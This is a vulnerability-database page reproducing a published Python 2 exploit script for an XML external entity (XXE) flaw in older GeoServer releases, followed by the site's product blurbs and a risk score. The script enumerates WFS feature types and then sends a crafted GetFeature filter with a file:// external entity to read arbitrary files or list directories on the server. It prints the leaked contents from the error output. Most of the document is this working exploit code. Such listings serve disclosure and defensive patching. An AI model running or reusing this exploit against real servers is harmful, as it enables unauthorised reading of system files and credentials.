Vulners
Lucene search
Geoserver < 2.7.1.1 / < 2.6.4 / < 2.5.5.1 - XXE Exploit
# Exploit Title : GeoServer XXE
# Date : 11/08/2015
# Exploit Author : David Bloom (Script) - (Ping to Sven Claessens, Jacques Villemur and Eric Donners)
# Vendor homepage : http://geoserver.org
# Software Link : http://geoserver.org/release/stable
# Version : 2.7 : <2.7.1.1 / 2.6 : <2.6.4 / 2.5 : <2.5.5.1
# Tested : Client Windows, Server Linux/Jetty
# Vendor bug track : GEOS-7032
# CVE : No CVE
# Category : Webapps
# Description : An XXE vulnerability in geoserver allows to view file contents and list directories on the server.
from xml.etree import ElementTree
import sys
import urllib2
import urllib
def main():
print '\n-----------------------\nGeoServer XXE Exploit\nScript by David Bloom\nTwitter: @philophobia78\n-----------------------\n'
if len(sys.argv) != 3 :
print "Usage geoserver-xxe.py [URL] [File Or Dir]"
return
geoServerUrl = sys.argv[1]
fileName = sys.argv[2]
featuresUrl = geoServerUrl + "/wfs?request=GetCapabilities"
exploitUrl = geoServerUrl + "/wfs?request=GetFeature&SERVICE=WFS&VERSION=1.0.0&[email protected]@&FILTER=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%20%3C!DOCTYPE%20foo%20[%20%3C!ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%[email protected]@%22%20%3E]%3E%3CFilter%20%3E%3CPropertyIsEqualTo%3E%3CPropertyName%3E%26xxe%3B%3C%2FPropertyName%3E%3CLiteral%3EBrussels%3C%2FLiteral%3E%3C%2FPropertyIsEqualTo%3E%3C%2FFilter%3E"
response = urllib2.urlopen(featuresUrl)
root = ElementTree.fromstring(response.read())
print "Searching geoserver features ... : \n"
gsFeatures = []
for node in root.iter():
if 'FeatureTypeList' in node.tag :
for feature in node.iter():
if 'Name' in feature.tag :
gsFeatures.append(feature.text)
print "Feature found :" + feature.text
if not gsFeatures:
print "No geoserver feature found, wrong url ?"
return
print "\nCandidate used : " + gsFeatures[0] + "\n"
print "Trying XXE : "
print "-------------\n"
exploitUrl = exploitUrl.replace("@[email protected]",gsFeatures[0])
exploitUrl = exploitUrl.replace("@[email protected]",fileName)
print exploitUrl + "\n\n"
try :
response = urllib2.urlopen(exploitUrl)
# Clean output from exceptions string
trashOutput = response.read()
beginRef = "Illegal property name:"
endRef = "for feature type"
fileStart = trashOutput.index(beginRef) + len(beginRef)
fileStop = trashOutput.index(endRef)
print "Output"
print "-------\n"
print trashOutput[fileStart:fileStop].strip()
except :
print "An error occured, maybe a premission error"
if __name__ == '__main__':
main()
# 0day.today [2018-01-05] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Aug 2015 00:00Current
7.1High risk
Vulners AI Score7.1